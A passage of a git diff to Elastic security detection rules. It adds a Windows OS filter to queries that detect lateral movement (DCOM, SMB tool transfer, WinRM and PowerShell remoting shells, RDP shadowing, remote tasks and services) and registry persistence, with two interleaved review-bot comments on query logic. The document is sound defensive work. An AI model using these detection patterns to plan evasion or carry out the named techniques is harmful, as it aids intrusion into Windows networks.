@@ -27,10 +27,10 @@ type = "eql" query = ''' sequence with maxspan=1m - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "mshta.exe" and process.args : "-Embedding" ] by host.id, process.entity_id - [network where event.type == "start" and process.name : "mshta.exe" and + [network where host.os.type == "windows" and event.type == "start" and process.name : "mshta.exe" and network.direction : ("incoming", "ingress") and network.transport == "tcp" and source.port > 49151 and destination.port > 49151 and source.ip != "127.0.0.1" and source.ip != "::1" ] by host.id, process.entity_id diff --git a/rules/windows/lateral_movement_dcom_mmc20.toml b/rules/windows/lateral_movement_dcom_mmc20.toml index eef975b11..c3f2299c6 100644 --- a/rules/windows/lateral_movement_dcom_mmc20.toml +++ b/rules/windows/lateral_movement_dcom_mmc20.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,11 +27,11 @@ type = "eql" query = ''' sequence by host.id with maxspan=1m - [network where event.type == "start" and process.name : "mmc.exe" and source.port >= 49152 and + [network where host.os.type == "windows" and event.type == "start" and process.name : "mmc.exe" and source.port >= 49152 and destination.port >= 49152 and source.ip != "127.0.0.1" and source.ip != "::1" and network.direction : ("incoming", "ingress") and network.transport == "tcp" ] by process.entity_id - [process where event.type == "start" and process.parent.name : "mmc.exe" + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "mmc.exe" ] by process.parent.entity_id ''' 
diff --git a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml index c4bdd1edd..6524c2568 100644 --- a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml +++ b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,11 +27,11 @@ type = "eql" query = ''' sequence by host.id with maxspan=5s - [network where event.type == "start" and process.name : "explorer.exe" and + [network where host.os.type == "windows" and event.type == "start" and process.name : "explorer.exe" and network.direction : ("incoming", "ingress") and network.transport == "tcp" and source.port > 49151 and destination.port > 49151 and source.ip != "127.0.0.1" and source.ip != "::1" ] by process.entity_id - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "explorer.exe" ] by process.parent.entity_id ''' diff --git a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml index 157565a62..f949a3667 100644 --- a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml +++ b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type in ("creation", "change") and +registry where host.os.type == "windows" and event.type in ("creation", "change") and registry.path : "HKLM\\SYSTEM\\*ControlSet*\\services\\LanmanServer\\Parameters\\NullSessionPipes" and length(registry.data.strings) > 0 ''' diff --git a/rules/windows/lateral_movement_direct_outbound_smb_connection.toml b/rules/windows/lateral_movement_direct_outbound_smb_connection.toml index 5d70c0beb..7d9a1b33b 100644 --- a/rules/windows/lateral_movement_direct_outbound_smb_connection.toml +++ b/rules/windows/lateral_movement_direct_outbound_smb_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -76,7 +76,7 @@ type = "eql" query = ''' sequence by process.entity_id - [process where event.type == "start" and host.os.name == "Windows" and process.pid != 4 and + [process where host.os.type == "windows" and event.type == "start" and process.pid != 4 and not (process.executable : "D:\\EnterpriseCare\\tools\\jre.1\\bin\\java.exe" and process.args : "com.emeraldcube.prism.launcher.Invoker") and not (process.executable : "C:\\Docusnap 11\\Tools\\nmap\\nmap.exe" and process.args : "smb-os-discovery.nse") and not process.executable : @@ -89,7 +89,7 @@ sequence by process.entity_id "?:\\Program Files\\uptime software\\uptime\\UptimeDataCollector.exe", "?:\\Program Files\\CloudMatters\\auvik\\AuvikAgentService.exe", "?:\\Program Files\\Rumble\\rumble-agent-*.exe")] - [network where destination.port == 445 and process.pid != 4 and + [network where host.os.type == "windows" and destination.port == 445 and process.pid != 4 and not cidrmatch(destination.ip, "127.0.0.1", "::1")] ''' 
diff --git a/rules/windows/lateral_movement_evasion_rdp_shadowing.toml b/rules/windows/lateral_movement_evasion_rdp_shadowing.toml index 5d26dfbbb..58c60569d 100644 --- a/rules/windows/lateral_movement_evasion_rdp_shadowing.toml +++ b/rules/windows/lateral_movement_evasion_rdp_shadowing.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -37,7 +37,7 @@ query = ''' /* Identifies the modification of RDP Shadow registry or the execution of processes indicative of active shadow RDP session */ -any where +any where host.os.type == "windows" and (event.category == "registry" and registry.path : "HKLM\\Software\\Policies\\Microsoft\\Windows NT\\Terminal Services\\Shadow" ) or diff --git a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml index c404504fc..9b6692e2b 100644 --- a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml +++ b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
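Review bot: In the rdp_shadowing query the new `any where host.os.type == "windows" and` is placed directly in front of an expression whose top level is `(event.category == "registry" and ...) or ...`; because `and` binds tighter than `or` in EQL, the OS filter constrains only the registry branch, and the process-execution alternative that the leading comment describes is left unfiltered. Wrap the original disjunction so the filter covers both sides: change the added line to `any where host.os.type == "windows" and (` and close the group with a matching `)` after the last alternative at the end of the query. The remainder of the expression runs past the hunk, so the closing position has to be confirmed there; none of the other `any where` hunks in this chunk have the problem because their first operand is already parenthesised as a whole.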
@@ -66,12 +66,12 @@ type = "eql" query = ''' sequence by host.id with maxspan=30s - [network where event.type == "start" and process.pid == 4 and destination.port == 445 and + [network where host.os.type == "windows" and event.type == "start" and process.pid == 4 and destination.port == 445 and network.direction : ("incoming", "ingress") and network.transport == "tcp" and source.ip != "127.0.0.1" and source.ip != "::1" ] by process.entity_id /* add more executable extensions here if they are not noisy in your environment */ - [file where event.type in ("creation", "change") and process.pid == 4 and file.extension : ("exe", "dll", "bat", "cmd")] by process.entity_id + [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and file.extension : ("exe", "dll", "bat", "cmd")] by process.entity_id ''' diff --git a/rules/windows/lateral_movement_execution_from_tsclient_mup.toml b/rules/windows/lateral_movement_execution_from_tsclient_mup.toml index d8c8c4798..22514535c 100644 --- a/rules/windows/lateral_movement_execution_from_tsclient_mup.toml +++ b/rules/windows/lateral_movement_execution_from_tsclient_mup.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.executable : "\\Device\\Mup\\tsclient\\*.exe" +process where host.os.type == "windows" and event.type == "start" and process.executable : "\\Device\\Mup\\tsclient\\*.exe" ''' diff --git a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml index 94186d510..55a03fffa 100644 
--- a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml +++ b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -74,8 +74,8 @@ type = "eql" query = ''' sequence with maxspan=1m - [file where event.type in ("creation", "change") and process.pid == 4 and file.extension : "exe"] by host.id, file.path - [process where event.type == "start"] by host.id, process.executable + [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and file.extension : "exe"] by host.id, file.path + [process where host.os.type == "windows" and event.type == "start"] by host.id, process.executable ''' diff --git a/rules/windows/lateral_movement_incoming_winrm_shell_execution.toml b/rules/windows/lateral_movement_incoming_winrm_shell_execution.toml index 3d5202447..d849b93f0 100644 --- a/rules/windows/lateral_movement_incoming_winrm_shell_execution.toml +++ b/rules/windows/lateral_movement_incoming_winrm_shell_execution.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/27" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -31,10 +31,10 @@ type = "eql" query = ''' sequence by host.id with maxspan=30s - [network where process.pid == 4 and network.direction : ("incoming", "ingress") and + [network where host.os.type == "windows" and process.pid == 4 and network.direction : ("incoming", "ingress") and destination.port in (5985, 5986) and network.protocol == "http" and source.ip != "127.0.0.1" and source.ip != "::1" ] - [process where event.type == "start" and process.parent.name : "winrshost.exe" and not process.name : "conhost.exe"] + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "winrshost.exe" and not process.name : "conhost.exe"] ''' diff --git a/rules/windows/lateral_movement_incoming_wmi.toml b/rules/windows/lateral_movement_incoming_wmi.toml index dc04b0010..32399f80c 100644 --- a/rules/windows/lateral_movement_incoming_wmi.toml +++ b/rules/windows/lateral_movement_incoming_wmi.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -28,13 +28,13 @@ sequence by host.id with maxspan = 2s /* Accepted Incoming RPC connection by Winmgmt service */ - [network where process.name : "svchost.exe" and network.direction : ("incoming", "ingress") and + [network where host.os.type == "windows" and process.name : "svchost.exe" and network.direction : ("incoming", "ingress") and source.ip != "127.0.0.1" and source.ip != "::1" and source.port >= 49152 and destination.port >= 49152 ] /* Excluding Common FPs Nessus and SCCM */ - [process where event.type == "start" and process.parent.name : "WmiPrvSE.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "WmiPrvSE.exe" and not process.args : ("C:\\windows\\temp\\nessus_*.txt", "C:\\windows\\TEMP\\nessus_*.TMP", "C:\\Windows\\CCM\\SystemTemp\\*", diff --git a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml index 77dad2ab6..56fbd7dfa 100644 --- a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml +++ b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/18" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ((process.name : "net.exe" or process.pe.original_file_name == "net.exe") or ((process.name : "net1.exe" or process.pe.original_file_name == "net1.exe") and not process.parent.name : "net.exe")) and process.args : "use" and 
diff --git a/rules/windows/lateral_movement_powershell_remoting_target.toml b/rules/windows/lateral_movement_powershell_remoting_target.toml index 802cf3bbf..ee1e5710e 100644 --- a/rules/windows/lateral_movement_powershell_remoting_target.toml +++ b/rules/windows/lateral_movement_powershell_remoting_target.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,9 +34,9 @@ type = "eql" query = ''' sequence by host.id with maxspan = 30s - [network where network.direction : ("incoming", "ingress") and destination.port in (5985, 5986) and + [network where host.os.type == "windows" and network.direction : ("incoming", "ingress") and destination.port in (5985, 5986) and network.protocol == "http" and source.ip != "127.0.0.1" and source.ip != "::1"] - [process where event.type == "start" and process.parent.name : "wsmprovhost.exe" and not process.name : "conhost.exe"] + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "wsmprovhost.exe" and not process.name : "conhost.exe"] ''' diff --git a/rules/windows/lateral_movement_rdp_enabled_registry.toml b/rules/windows/lateral_movement_rdp_enabled_registry.toml index 8eb554660..b380b0b42 100644 --- a/rules/windows/lateral_movement_rdp_enabled_registry.toml +++ b/rules/windows/lateral_movement_rdp_enabled_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -65,7 +65,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type in ("creation", "change") and +registry where host.os.type == "windows" and event.type in ("creation", "change") and registry.path : "HKLM\\SYSTEM\\*ControlSet*\\Control\\Terminal Server\\fDenyTSConnections" and registry.data.strings : ("0", "0x00000000") and not (process.name : "svchost.exe" and user.domain == "NT AUTHORITY") and not process.executable : "C:\\Windows\\System32\\SystemPropertiesRemote.exe" diff --git a/rules/windows/lateral_movement_rdp_sharprdp_target.toml b/rules/windows/lateral_movement_rdp_sharprdp_target.toml index 2a22f2746..1829f7ab6 100644 --- a/rules/windows/lateral_movement_rdp_sharprdp_target.toml +++ b/rules/windows/lateral_movement_rdp_sharprdp_target.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -31,17 +31,17 @@ query = ''' /* Incoming RDP followed by a new RunMRU string value set to cmd, powershell, taskmgr or tsclient, followed by process execution within 1m */ sequence by host.id with maxspan=1m - [network where event.type == "start" and process.name : "svchost.exe" and destination.port == 3389 and + [network where host.os.type == "windows" and event.type == "start" and process.name : "svchost.exe" and destination.port == 3389 and network.direction : ("incoming", "ingress") and network.transport == "tcp" and source.ip != "127.0.0.1" and source.ip != "::1" ] - [registry where process.name : "explorer.exe" and + [registry where host.os.type == "windows" and process.name : "explorer.exe" and registry.path : ("HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\*") and registry.data.strings : ("cmd.exe*", "powershell.exe*", "taskmgr*", "\\\\tsclient\\*.exe\\*") ] - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and (process.parent.name : ("cmd.exe", "powershell.exe", "taskmgr.exe") or process.args : ("\\\\tsclient\\*.exe")) and not process.name : "conhost.exe" ] diff --git a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml index fec006f09..19d0fbce3 100644 --- a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml +++ b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : ("cmd.exe", "powershell.exe", "robocopy.exe", "xcopy.exe") and process.args : ("copy*", "move*", "cp", "mv") and process.args : "*$*" ''' diff --git a/rules/windows/lateral_movement_remote_service_installed_winlog.toml b/rules/windows/lateral_movement_remote_service_installed_winlog.toml index b7138c580..526b7c577 100644 --- a/rules/windows/lateral_movement_remote_service_installed_winlog.toml +++ b/rules/windows/lateral_movement_remote_service_installed_winlog.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,9 +25,9 @@ type = "eql" query = ''' sequence by winlog.logon.id, winlog.computer_name with maxspan=1m -[authentication where event.action == "logged-in" and winlog.logon.type : "Network" and +[authentication where host.os.type == "windows" and event.action == "logged-in" and winlog.logon.type : "Network" and event.outcome=="success" and source.ip != null and source.ip != "127.0.0.1" and source.ip != "::1"] -[iam where event.action == "service-installed" and +[iam where host.os.type == "windows" and event.action == "service-installed" and not winlog.event_data.SubjectLogonId : "0x3e7" and not winlog.event_data.ServiceFileName : ("?:\\Windows\\ADCR_Agent\\adcrsvc.exe", diff --git a/rules/windows/lateral_movement_remote_services.toml b/rules/windows/lateral_movement_remote_services.toml index 29b171be0..9558e5f1d 100644 --- a/rules/windows/lateral_movement_remote_services.toml +++ b/rules/windows/lateral_movement_remote_services.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -82,12 +82,12 @@ type = "eql" query = ''' sequence with maxspan=1s - [network where process.name : "services.exe" and + [network where host.os.type == "windows" and process.name : "services.exe" and network.direction : ("incoming", "ingress") and network.transport == "tcp" and source.port >= 49152 and destination.port >= 49152 and source.ip != "127.0.0.1" and source.ip != "::1" ] by host.id, process.entity_id - [process where event.type == "start" and process.parent.name : "services.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "services.exe" and not (process.name : "svchost.exe" and process.args : "tiledatamodelsvc") and not (process.name : "msiexec.exe" and process.args : "/V") and not process.executable : diff --git a/rules/windows/lateral_movement_remote_task_creation_winlog.toml b/rules/windows/lateral_movement_remote_task_creation_winlog.toml index c9f6ce710..e1071952d 100644 --- a/rules/windows/lateral_movement_remote_task_creation_winlog.toml +++ b/rules/windows/lateral_movement_remote_task_creation_winlog.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -56,12 +56,12 @@ query = ''' /* Network Logon followed by Scheduled Task creation */ sequence by winlog.computer_name with maxspan=1m - [authentication where event.action == "logged-in" and + [authentication where host.os.type == "windows" and event.action == "logged-in" and winlog.logon.type == "Network" and event.outcome == "success" and not user.name == "ANONYMOUS LOGON" and not winlog.event_data.SubjectUserName : "*$" and not user.domain == "NT AUTHORITY" and source.ip != "127.0.0.1" and source.ip !="::1"] by winlog.event_data.TargetLogonId - [iam where event.action == "scheduled-task-created"] by winlog.event_data.SubjectLogonId + [iam where host.os.type == "windows" and event.action == "scheduled-task-created"] by winlog.event_data.SubjectLogonId ''' diff --git a/rules/windows/lateral_movement_scheduled_task_target.toml b/rules/windows/lateral_movement_scheduled_task_target.toml index e477f9dca..b9d993e3f 100644 --- a/rules/windows/lateral_movement_scheduled_task_target.toml +++ b/rules/windows/lateral_movement_scheduled_task_target.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -52,11 +52,11 @@ query = ''' /* Task Scheduler service incoming connection followed by TaskCache registry modification */ sequence by host.id, process.entity_id with maxspan = 1m - [network where process.name : "svchost.exe" and + [network where host.os.type == "windows" and process.name : "svchost.exe" and network.direction : ("incoming", "ingress") and source.port >= 49152 and destination.port >= 49152 and source.ip != "127.0.0.1" and source.ip != "::1" ] - [registry where registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions"] + [registry where host.os.type == "windows" and registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions"] ''' diff --git a/rules/windows/lateral_movement_service_control_spawned_script_int.toml b/rules/windows/lateral_movement_service_control_spawned_script_int.toml index b8f0b59ea..ea3029710 100644 --- a/rules/windows/lateral_movement_service_control_spawned_script_int.toml +++ b/rules/windows/lateral_movement_service_control_spawned_script_int.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ type = "eql" query = ''' /* This rule is not compatible with Sysmon due to user.id issues */ -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "sc.exe" or process.pe.original_file_name == "sc.exe") and process.parent.name : ("cmd.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe", "mshta.exe","powershell.exe", "pwsh.exe") and 
diff --git a/rules/windows/lateral_movement_suspicious_rdp_client_imageload.toml b/rules/windows/lateral_movement_suspicious_rdp_client_imageload.toml index 19a754c80..a9115c276 100644 --- a/rules/windows/lateral_movement_suspicious_rdp_client_imageload.toml +++ b/rules/windows/lateral_movement_suspicious_rdp_client_imageload.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and +any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and (dll.name : "mstscax.dll" or file.name : "mstscax.dll") and /* depending on noise in your env add here extra paths */ process.executable : diff --git a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml index e30918875..a8f3bcb60 100644 --- a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml +++ b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type in ("creation", "change") and +file where host.os.type == "windows" and event.type in ("creation", "change") and /* via RDP TSClient mounted share or SMB */ (process.name : "mstsc.exe" or process.pid == 4) and 
diff --git a/rules/windows/persistence_ad_adminsdholder.toml b/rules/windows/persistence_ad_adminsdholder.toml index b980b44ba..24738e44f 100644 --- a/rules/windows/persistence_ad_adminsdholder.toml +++ b/rules/windows/persistence_ad_adminsdholder.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,8 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.action:"Directory Service Changes" and event.code:5136 and winlog.event_data.ObjectDN:CN=AdminSDHolder,CN=System* +event.action:"Directory Service Changes" and host.os.type:windows and event.code:5136 and + winlog.event_data.ObjectDN:CN=AdminSDHolder,CN=System* ''' diff --git a/rules/windows/persistence_adobe_hijack_persistence.toml b/rules/windows/persistence_adobe_hijack_persistence.toml index 1de3f1eea..6aa5bc627 100644 --- a/rules/windows/persistence_adobe_hijack_persistence.toml +++ b/rules/windows/persistence_adobe_hijack_persistence.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -77,7 +77,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "creation" and +file where host.os.type == "windows" and event.type == "creation" and file.path : ("?:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.exe", "?:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.exe") and not process.name : "msiexec.exe" diff --git a/rules/windows/persistence_app_compat_shim.toml b/rules/windows/persistence_app_compat_shim.toml index 8facccf5e..c6ca44c22 100644 
--- a/rules/windows/persistence_app_compat_shim.toml
+++ b/rules/windows/persistence_app_compat_shim.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -25,9 +25,9 @@ type = "eql"
 query = '''
 sequence by process.entity_id with maxspan = 5m
- [process where event.type == "start" and
+ [process where host.os.type == "windows" and event.type == "start" and
 not (process.name : "sdbinst.exe" and process.parent.name : "msiexec.exe")]
- [registry where event.type in ("creation", "change") and
+ [registry where host.os.type == "windows" and event.type in ("creation", "change") and
 registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\*.sdb"]
 '''
diff --git a/rules/windows/persistence_appcertdlls_registry.toml b/rules/windows/persistence_appcertdlls_registry.toml
index 0940313e3..836e354f8 100644
--- a/rules/windows/persistence_appcertdlls_registry.toml
+++ b/rules/windows/persistence_appcertdlls_registry.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where
+registry where host.os.type == "windows" and
 /* uncomment once stable length(bytes_written_string) > 0 and */
 registry.path : "HKLM\\SYSTEM\\*ControlSet*\\Control\\Session Manager\\AppCertDLLs\\*"
 '''
diff --git a/rules/windows/persistence_appinitdlls_registry.toml b/rules/windows/persistence_appinitdlls_registry.toml
index 735550248..5fd69e4ea 100644
--- a/rules/windows/persistence_appinitdlls_registry.toml
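Review bot: The commented-out predicate kept right under the new `registry where host.os.type == "windows" and` line in the AppCertDLLs query references `bytes_written_string`, a field name that does not match what the sibling rules in this same change use: the IFEO rule filters live on `length(registry.data.strings) > 0` and persistence_registry_uncommon.toml carries the same placeholder as `/* uncomment once stable length(registry.data.strings) > 0 and */`. If that comment is ever uncommented as written it will not do what the author intended, and the mismatch looks like a stale field name rather than a deliberate choice. Since this hunk is touching the line anyway, I would align it with its siblings: `/* uncomment once stable length(registry.data.strings) > 0 and */`, or promote it to a live predicate as the IFEO rule already does if that data is considered stable now.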
+++ b/rules/windows/persistence_appinitdlls_registry.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/09"
+updated_date = "2023/03/02"
 [rule]
 author = ["Elastic"]
@@ -81,7 +81,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where
+registry where host.os.type == "windows" and
 registry.path : ("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls",
 "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls") and
 not process.executable : ("C:\\Windows\\System32\\msiexec.exe",
diff --git a/rules/windows/persistence_dontexpirepasswd_account.toml b/rules/windows/persistence_dontexpirepasswd_account.toml
index e5600b10f..923487c9e 100644
--- a/rules/windows/persistence_dontexpirepasswd_account.toml
+++ b/rules/windows/persistence_dontexpirepasswd_account.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -77,7 +77,8 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.action:"modified-user-account" and event.code:"4738" and message:"'Don't Expire Password' - Enabled" and not user.id:"S-1-5-18"
+event.action:"modified-user-account" and host.os.type:windows and event.code:"4738" and
